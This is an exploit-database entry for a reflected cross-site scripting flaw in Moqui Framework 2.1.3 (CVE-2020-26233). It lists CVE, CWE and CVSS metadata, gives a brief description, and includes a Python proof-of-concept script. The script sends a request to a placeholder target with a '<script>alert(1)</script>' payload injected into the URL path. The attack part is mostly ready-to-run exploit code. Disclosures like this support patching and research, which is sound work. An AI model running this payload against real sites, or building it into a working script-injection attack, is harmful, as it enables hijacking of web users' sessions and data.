Advertisement






Moqui Framework 2.1.3 - Reflected Cross Site Scripting

CVE Category Price Severity
CVE-2020-26233 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-24
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070066

Below is a copy:

Moqui Framework 2.1.3 - Reflected Cross Site Scripting
# Exploit Author: Maximus Decimus or [email protected]
# Software Link: https://github.com/moqui/moqui-framework/
# Vendor Homepage: https://www.moqui.org/
# Tested on: Windows 10

=====================================

# Description : This framework is vulnerable to xss attack due to the lack of proper input filtering
# for more information , check out this page : https://www.moqui.org/docs

=====================================

# POC : 
# Set the target url and run the following python script


import requests

url_string = "https://target.com:443/;<script>alert(1)</script>test1337"
request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0"}
requests.get(url_string, headers=request_headers)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.